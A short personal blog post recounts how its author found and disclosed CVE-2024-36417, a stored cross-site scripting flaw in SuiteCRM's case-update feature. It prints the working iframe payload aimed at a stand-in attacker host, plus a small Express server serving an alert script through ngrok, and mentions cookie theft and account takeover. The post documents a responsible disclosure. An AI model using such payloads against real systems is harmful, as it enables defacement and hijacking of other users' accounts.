How i discovered my first CVE

1day
2 min readJun 14, 2024

--

Here is a brief introduction on me before starting, I’m a 19 y/o Cyber security enthusiast/learner who likes to hunt down bugs as passion. This is a very quick article on how i discovered my first CVE. So lets get into it…

Screenshot from mitre.org

CVE-2024–36417

Mire.org : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36417

NVD : https://nvd.nist.gov/vuln/detail/CVE-2024-36417

POC : https://github.com/salesagility/SuiteCRM/security/advisories/GHSA-3www-6rqc-rm7j

POC (Video) : https://drive.google.com/file/d/1LhQpeMNo-xBMy7ciRt-DvG2DbP7UUW-p/view

The Discovery 🔎

I was hunting for bugs on platforms like HackerOne and Bugcrowd and was onto nothing for months. Then i thought “Why don’t i hunt some open-source systems?”. Quickly hopped onto github and searched for well maintained CRM repositories. Then i found SuiteCRM. Had decent amount of stars and it was maintained frequently. Cloned onto my system, Started the server. I started clicking on all buttons, hyperlinks, navigation to map the webapp structure…

The Bug 🪲

After clicking through the system for about 1 hour i found a sweet spot! A feature for the users where they can post “Case updates” about a specific case. If i post a “Case update” as user1, the user2 can view it.

I started posting classic XSS payloads but it was getting filtered. Tried many tags but many of em didn’t worked. Finally, one tag worked! The <iframe> tag worked without getting filtered.

I tried posting :

<iframe src="https://test.attacker.com">

And it worked, now i logged out from user1, and logged in to user2.

Went to the case page and there i can see the iframe being rendered successfully.

Now, to demonstrate impact, i created a webserver on my local machine with the following code :

const express = require('express');
const app = express();
const port = 2222

app.use(express.json());
app.get('/', async (req, res)=>{
return res.send("<script>alert('You are hacked')</script>");
})



app.listen(port, () => {
console.log(`Server started`)
});

And i port-forwarded the web-server using Ngrok.

Then i crafted an iframe as follows:

<iframe src="https://test.ngrok-free.app">

and posted it as a case update as the user1. I logged out from user1, and logged into user2 (victim).

When i visited the Case updates, BOOM! The page says “You are hacked”. Which means the XSS successfully worked through the iframe.

Now as an attacker i could do a permanent page defacement using the iframe and can also craft a cookie stealer webpage which can lead to a potential Account takeover attack.

Conclusion ✨

This was a quick & small article on my CVE discovery. Hope you liked it, Please clap for this story if you liked it. Thank You 💖

Timeline 🕔

Reported on : 15/01/2024

First response : 06/02/2024

CVE published on : 10/06/2024

--

--